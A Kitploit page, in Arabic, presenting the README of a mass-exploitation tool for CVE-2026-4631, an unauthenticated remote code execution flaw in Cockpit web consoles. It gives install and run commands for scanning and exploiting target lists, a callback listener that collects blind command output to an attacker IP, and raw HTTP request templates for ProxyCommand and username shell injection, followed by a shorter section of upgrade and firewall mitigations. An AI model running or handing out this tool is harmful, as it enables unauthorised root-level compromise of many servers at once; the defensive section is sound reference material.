Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-4631-cockpit-RCE — تنفيذ التعليمات البرمجية عن بُعد غير مصادق عليه عبر حقن وسيط سطر أوامر SSH Cockpit الإصدارات 327 – 359 | CVSS 9.8 Critical | CWE-78 | Kitploit
أدوات/GitHubGitHub/exdev994/cve-2026-4631-cockpit-rce
ماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالقيادة والسيطرةالفريق الأحمرأداة الوصول عن بعد
GitHubexdev994/cve-2026-4631-cockpit-rce

CVE-2026-4631-cockpit-RCE

تنفيذ التعليمات البرمجية عن بُعد غير مصادق عليه عبر حقن وسيط سطر أوامر SSH Cockpit الإصدارات 327 – 359 | CVSS 9.8 Critical | CWE-78

عرض المستودع
21منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-4631 — أداة استغلال جماعي لـ Cockpit

تنفيذ أوامر عن بُعد غير مصدق عبر حقن وسيط سطر أوامر SSH إصدارات Cockpit 327 – 359 | CVSS 9.8 حرج | CWE-78

أداة استغلال جماعي لـ CVE-2026-4631 على خدمة الويب Cockpit (cockpit-ws، المنفذ 9090). تدعم وضع فحص الثغرات، وضع RCE مع التقاط مخرجات الأوامر عبر مستمع رد اتصال HTTP مدمج، وضع --auto (فحص واستغلال دفعة واحدة مع الأمر الافتراضي id)، إضافة المنفذ :9090 تلقائيًا للأهداف بدون منفذ، كلا متجهي الهجوم (ProxyCommand + حقن اسم المستخدم %r)، أهداف جماعية من ملف، معالجة متزامنة، ومخرجات نتائج منظمة.

المؤلف: 0xNuts


بداية سريعة

الاستنساخ والتثبيت

git clone https://github.com/ExDev994/CVE-2026-4631-cockpit-RCE.git
cd CVE-2026-4631-cockpit-RCE
pip install -r requirements.txt

إعداد الأهداف

حرر targets.txt — مضيف واحد لكل سطر. سيتم إضافة المنفذ :9090 تلقائيًا إذا لم يكن موجودًا:

192.168.1.10
cockpit.example.com
https://manage.lab.local

التشغيل (وضع AUTO — موصى به)

# فحص + استغلال دفعة واحدة، الأمر الافتراضي "id"
python3 exploit.py -f targets.txt --auto --callback-ip <IP_ATTACKER>

# مثال على الإخراج في results.txt:
# example.com:9090 [ uid=0(root) gid=0(root) groups=0(root) ]

الأوضاع الأخرى

# فحص الثغرات فقط (بدون استغلال)
python3 exploit.py -f targets.txt --scan -o scan_results.txt

# RCE صريح بأمر مخصص
python3 exploit.py -f targets.txt -c "whoami" --callback-ip <IP_ATTACKER>

# هدف واحد
python3 exploit.py -t cockpit.example.com --auto --callback-ip <IP_ATTACKER>

ملاحظات حول رد الاتصال

CVE-2026-4631 هو RCE أعمى — لا تعود مخرجات الأوامر في استجابة HTTP. تستخدم الأداة مستمع HTTP مدمج (المنفذ الافتراضي 8888) لالتقاط المخرجات. تأكد من:

  1. --callback-ip هو عنوان IP يمكن للهدف الوصول إليه (ليس 127.0.0.1)
  2. جدار الحماية يسمح بالاتصال الوارد على منفذ TCP 8888 (أو --listener-port المخصص)
  3. يمكن للهدف إجراء اتصال HTTP صادر إلى عنوان IP المهاجم

طريقة الإصلاح / التخفيف (للمدافع)

1. ترقية Cockpit (إلزامي)

# Debian / Ubuntu
sudo apt update && sudo apt install cockpit-ws

# RHEL / Fedora / CentOS
sudo dnf update cockpit-ws

# التحقق من الإصدار (يجب أن يكون >= 360)
dpkg -l cockpit-ws | awk 'NR==5{print $3}'   # Debian
rpm -q cockpit-ws                            # RHEL

2. تعطيل تسجيل الدخول عن بُعد (حل بديل)

حرر /etc/cockpit/cockpit.conf:

[WebService]
LoginTo = false

أعد تشغيل الخدمة:

sudo systemctl restart cockpit

3. تجزئة الشبكة

اقتصر المنفذ 9090 على شبكة الإدارة فقط:

sudo iptables -A INPUT -p tcp --dport 9090 -s 10.0.0.0/8 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 9090 -j DROP

4. ترقية OpenSSH >= 9.6

يخفف من Vector 1 (حقن ProxyCommand) عبر التحقق المبكر من اسم المضيف:

ssh -V   # يجب أن يكون OpenSSH_9.6 أو أحدث

5. التصحيح اليدوي (النقل العكسي)

إذا لم تتمكن من الترقية إلى 360، طبق التصحيح:

  • cockpit 9d0695647 — أضف فاصل -- في beiboot.py وcockpitauth.c
  • ferny 44ec511c99 — أضف -- في session.py

تفاصيل التصحيح: انظر docs/PATCH_ANALYSIS.md


جدول المحتويات

  1. ملخص الثغرة
  2. متجه الهجوم
  3. متطلبات الاستغلال
  4. التثبيت
  5. الاستخدام
  6. أوضاع التشغيل
  7. أمثلة التنفيذ
  8. تنسيق المخرجات
  9. هندسة الأداة
  10. هيكل الملفات
  11. آلية التقاط RCE الأعمى
  12. الكشف والتخفيف
  13. إخلاء المسؤولية القانوني
  14. المراجع

ملخص الثغرة

الحقلالتفاصيل
CVE IDCVE-2026-4631
GHSAGHSA-m4gv-x78h-3427
الخطورةحرج (CVSS 9.8)
CWECWE-78 — حقن أوامر نظام التشغيل
المتأثرCockpit 327 – 359
تم الإصلاح فيCockpit 360+
المصادقة المطلوبةلا (قبل المصادقة)
المبلغJelle van der Waa
الخدمةcockpit-ws، المنفذ الافتراضي 9090

استبدل Cockpit v327 cockpit-ssh (libssh) بـ python3 -m cockpit.beiboot الذي يستدعي عميل ssh الخاص بـ OpenSSH. يتم تمرير المدخلات التي يتحكم فيها المستخدم — اسم المضيف من مسار URL واسم المستخدم من رأس Authorization: Basic — إلى أداة ssh بدون تعقيم وبدون فاصل -- لنهاية الخيارات. يحدث الحقن قبل التحقق من بيانات الاعتماد، لذلك لا حاجة لتسجيل دخول صالح.


متجه الهجوم

المتجه 1 — حقن ProxyCommand (الرئيسي)

يتم حقن اسم المضيف من مسار URL مع خيار SSH -oProxyCommand=<cmd>.

GET /cockpit+=-oProxyCommand=<URL_ENCODED_PAYLOAD>/login HTTP/1.1
Host: target:9090
Authorization: Basic base64("x:x")

يقوم SSH بتحليل -oProxyCommand=<cmd> كخيار، وينفذ <cmd> كأمر ProxyCommand. يعمل الأمر كعملية مستخدم cockpit-ws.

المتطلبات: OpenSSH < 9.6 على الهدف. OpenSSH 9.6+ لديه تحقق مبكر من اسم المضيف يمنع الأحرف الخاصة.

المتجه 2 — حقن رمز اسم المستخدم %r (الثانوي)

يتم حقن اسم المستخدم من رأس Authorization: Basic مع أمر شل.

GET /cockpit+=legit-host/login HTTP/1.1
Host: target:9090
Authorization: Basic base64("x; <CMD>; #:x")

يقوم SSH بتوسيع %r باسم المستخدم في توجيه Match exec → تنفيذ الأوامر المحقونة في شل.

المتطلبات: يحتوي ملف ssh_config على الهدف على توجيه Match exec مع رمز %r.


متطلبات الاستغلال

جانب المهاجم (الجهاز الذي يشغل الأداة)

  • Python 3.8+
  • عنوان IP يمكن لهدف Cockpit الوصول إليه (لمستمع رد الاتصال)
  • منفذ مفتوح للمستمع (الافتراضي 8888)
  • جدار الحماية يسمح بالاتصال الوارد من الهدف إلى منفذ المستمع

جانب الهدف (مثيل Cockpit)

  • إصدار Cockpit 327 – 359
  • المنفذ 9090 قابل للوصول
  • ميزة تسجيل الدخول عن بُعد (LoginTo) غير معطلة
  • بالنسبة للمتجه 1: OpenSSH < 9.6
  • بالنسبة للمتجه 2: ssh_config مع Match exec %r

التثبيت

# استنساخ من GitHub
git clone https://github.com/ExDev994/CVE-2026-4631-cockpit-RCE.git
cd CVE-2026-4631-cockpit-RCE

# تثبيت التبعيات
pip install -r requirements.txt

# التحقق
python3 exploit.py --help

التبعيات

  • requests>=2.31 — عميل HTTP لطلب الاستغلال
  • colorama>=0.4 — مخرجات طرفية ملونة

لا توجد تبعيات إضافية للمستمع (يستخدم stdlib http.server + threading).


الاستخدام

usage: exploit.py [-h] [-t TARGET] [-f FILE] [--default-port PORT]
                  [-c CMD] [--scan] [--auto] [--vector {auto,proxycommand,username}]
                  [-o OUTPUT] [--callback-ip CALLBACK_IP] [--listener-port LISTENER_PORT]
                  [--threads THREADS] [--timeout TIMEOUT] [--delay DELAY] [--proxy PROXY]
                  [--user-agent UA] [-v] [--no-color]

CVE-2026-4631 Cockpit Mass Exploit — Unauthenticated RCE via SSH Argument Injection
تنزيل الأداة